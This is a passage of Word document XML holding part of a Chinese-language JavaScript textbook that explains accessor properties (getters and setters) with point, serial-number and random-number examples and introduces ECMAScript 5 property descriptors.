    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和数据属性不同，存取器属性不具有可写性（</w:t>
      </w:r>
      <w:r>
        <w:t>writable attribute</w:t>
      </w:r>
      <w:r>
        <w:t>）。如果属性同时具有</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法，那么它是一个读</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>写属性。如果它只有</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>方法，那么它是一个只读属性。如果它只有</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法，那么它是一个只写属性（数据属性中有一些例外），读取只写属性总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>定义存取器属性最简单的方法是使用对象直接量语法的一种扩展写法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={//</w:t>
      </w:r>
      <w:r>
        <w:t>普通的数据属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data_prop:value,//</w:t>
      </w:r>
      <w:r>
        <w:t>存取器属性都是成对定义的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get accessor_p</w:t>
      </w:r>
      <w:r>
        <w:t>rop(){/*</w:t>
      </w:r>
      <w:r>
        <w:t>这里是函数体</w:t>
      </w:r>
      <w:r>
        <w:t>*/},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>set accessor_prop(value){/*</w:t>
      </w:r>
      <w:r>
        <w:t>这里是函数体</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存取器属性定义为一个或两个和属性同名的函数，这个函数定义没有使用</w:t>
      </w:r>
      <w:r>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t>关键字，而是使用</w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t>和（或）</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>。注意，这</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>里没有使用冒号将属性名和函数体分隔开，但在函数体的结束和下一个方法或数据属性之间有逗号分隔。例如，思考下面这个表示</w:t>
      </w:r>
      <w:r>
        <w:t>2D</w:t>
      </w:r>
      <w:r>
        <w:t>笛卡尔点坐标</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>的对象。它有两个普通的属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>分别表示对应点的</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标和</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标，它还有两个等价的存取器属性用来表示点的极坐标：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p={/</w:t>
      </w:r>
      <w:r>
        <w:t>/x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>是普通的可读写的数据属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x:1.0,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y:1.0,//r</w:t>
      </w:r>
      <w:r>
        <w:t>是可读写的存取器属性，它有</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>函数体结束后不要忘记带上逗号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get r(){return Math.sqrt(this.x*this.x+this.y*this.y);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>set r(newvalue){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var oldvalue=Math.sqrt(this.x*this.x+this.y*this.y);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var ratio=newvalue/oldvalue;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.x*=ratio;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.y*</w:t>
      </w:r>
      <w:r>
        <w:t>=ratio;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},//theta</w:t>
      </w:r>
      <w:r>
        <w:t>是只读存取器属性，它只有</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get theta(){return Math.atan2(this.y,this.x);}</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注意在这段代码中</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>里</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字的用法。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>把这些函数当做对象的方法来调用，也就是说，在函数体内的</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>指向表示这个点的对象，因此，</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>属性的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>this.x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>this.y</w:t>
      </w:r>
      <w:r>
        <w:t>引用</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>8.2.2</w:t>
      </w:r>
      <w:r>
        <w:t>节会对方法和</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字做更详尽的讲述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>和数据属性一样，存取器属性是可以继承的，因此可以将上述代码中的对象</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>当做另一个</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>点</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的原型。可以给新对象定义它的</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>属性，但</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>theta</w:t>
      </w:r>
      <w:r>
        <w:t>属性是继承来的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var q=inherit(p);//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个继承</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>的新对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>q.x=1,q.y=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>添加两个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(q.r);//</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用继承的存取器属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(q.theta);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这段代码使用存取器属性定义</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>提供了表示同一组数据的两种方法（笛卡尔坐标系表示法和极坐标系表示法）。还有很多场景可以用到存取器属性，比如智能检测属性的写入值以及在每次属性读取时返回不同值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个对象产生严格自增的序列号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var serialnum={//</w:t>
      </w:r>
      <w:r>
        <w:t>这个数据属性包含下一个序列号</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//$</w:t>
      </w:r>
      <w:r>
        <w:t>符号暗示这个属性是一个私有属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$n:0,//</w:t>
      </w:r>
      <w:r>
        <w:t>返回当前值，然后自增</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get next(){return this.$n++;},//</w:t>
      </w:r>
      <w:r>
        <w:t>给</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>设置新的值，但只有当它比当前值大时才设置成功</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>set next(n){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=this.$n)this.$n=n;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else throw"</w:t>
      </w:r>
      <w:r>
        <w:t>序列号的值不能比当前值小</w:t>
      </w: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最后我们再来看一个例子，这个例子使用</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>方法实现一种</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>神奇</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这个对象有一个可以返回随机数的存取器属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>例如，表达式</w:t>
      </w:r>
      <w:r>
        <w:t>"random.octet"</w:t>
      </w:r>
      <w:r>
        <w:t>产生一个随机数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>每次产生的随机数都在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>255</w:t>
      </w:r>
      <w:r>
        <w:t>之间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var random={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get octet(){return Math.floor(Math.random()*256);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">get uint16(){return </w:t>
      </w:r>
      <w:r>
        <w:t>Math.floor(Math.random()*65536);},</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>get int16(){return Math.floor(Math.random()*65536)-32768;}</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本节介绍了如何给对象直接量定义存取器属性。下一节会介绍如何给一个已经存在的对象添加一个存取器属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="6_7_Shu_Xing_De_Te_Xing_"/>
      <w:r>
        <w:t>6.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　属性的特性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了包含名字和值之外，属性还包含一些标识它们可写、可枚举和可配置的特性。在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中无法设置这些特性，所有通过</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>的程序创建的属性都是可写的、可枚举的和可配置的</w:t>
      </w:r>
      <w:r>
        <w:t>，且无法对这些特性做修改。本节将讲述</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中查询和设置这些属性特性的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>对于库的开发者来说非常重要，因为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>给原型对象添加方法，并将它们设置成不可枚举的，这让它们看起来更像内置方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>给对象定义不能修改或删除的属性，借此</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>锁定</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这个对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在本节里，我们将存取器属性的</w:t>
      </w:r>
      <w:r>
        <w:t>getter</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法看成是属性的特性。按照这个逻辑，我们也可以把数据属性的值同样看做属性的特性。因此，可以认为一个属性包含一个名字和</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个特性。数据属性的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个特性分</w:t>
      </w:r>
      <w:r>
        <w:t>别是它的值（</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>）、可写性（</w:t>
      </w:r>
      <w:r>
        <w:t>writable</w:t>
      </w:r>
      <w:r>
        <w:t>）、可枚举性（</w:t>
      </w:r>
      <w:r>
        <w:t>enumerable</w:t>
      </w:r>
      <w:r>
        <w:t>）和可配置性（</w:t>
      </w:r>
      <w:r>
        <w:t>configurable</w:t>
      </w:r>
      <w:r>
        <w:t>）。存取器属性不具有值（</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>）特性和可写性，它们的可写性是由</w:t>
      </w:r>
      <w:r>
        <w:t>setter</w:t>
      </w:r>
      <w:r>
        <w:t>方法存在与否决定的。因此存取器属性的</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个特性是读取（</w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t>）、写入（</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>）、可枚举性和可配置性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>为了实现属性特性的查询和设置操作，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中定义了一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>属性描述符</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>property descriptor</w:t>
      </w:r>
      <w:r>
        <w:t>）的对象，这个对象代表那</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个特性。描述符对象的属性和它们所描述的属性特性是同名的。因</w:t>
      </w:r>
      <w:r>
        <w:t>此，数据属性的描述符对象的属性有</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>writable</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>enumerable</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>configurable</w:t>
      </w:r>
      <w:r>
        <w:t>。存取器属性的描述符对象则用</w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>属性代替</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>writable</w:t>
      </w:r>
      <w:r>
        <w:t>。其中</w:t>
      </w:r>
      <w:r>
        <w:t>writable</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>enumerable</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>configurable</w:t>
      </w:r>
      <w:r>
        <w:t>都是布尔值，当然，</w:t>
      </w:r>
      <w:r>
        <w:t>get</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t>属性是函数值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor()</w:t>
      </w:r>
      <w:r>
        <w:t>可以获得某个对象特定属性的属性描述符：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>{value:1,writable:true,enumerable:true</w:t>
      </w:r>
      <w:r>
        <w:t>,configurable:true}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor({x:1},"x");//</w:t>
      </w:r>
      <w:r>
        <w:t>查询上文中定义的</w:t>
      </w:r>
      <w:r>
        <w:t>randam</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>octet</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>{get:/*func*/,set:undefined,enumerable:true,configurable:true}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor(random,"octet");//</w:t>
      </w:r>
      <w:r>
        <w:t>对于继承属性和不存在的属性，返回</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getOwnPropertyDe</w:t>
      </w:r>
      <w:r>
        <w:t>scriptor({},"x");//undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，没有这个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.getOwnPropertyDescriptor({},"toString");//undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，继承属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
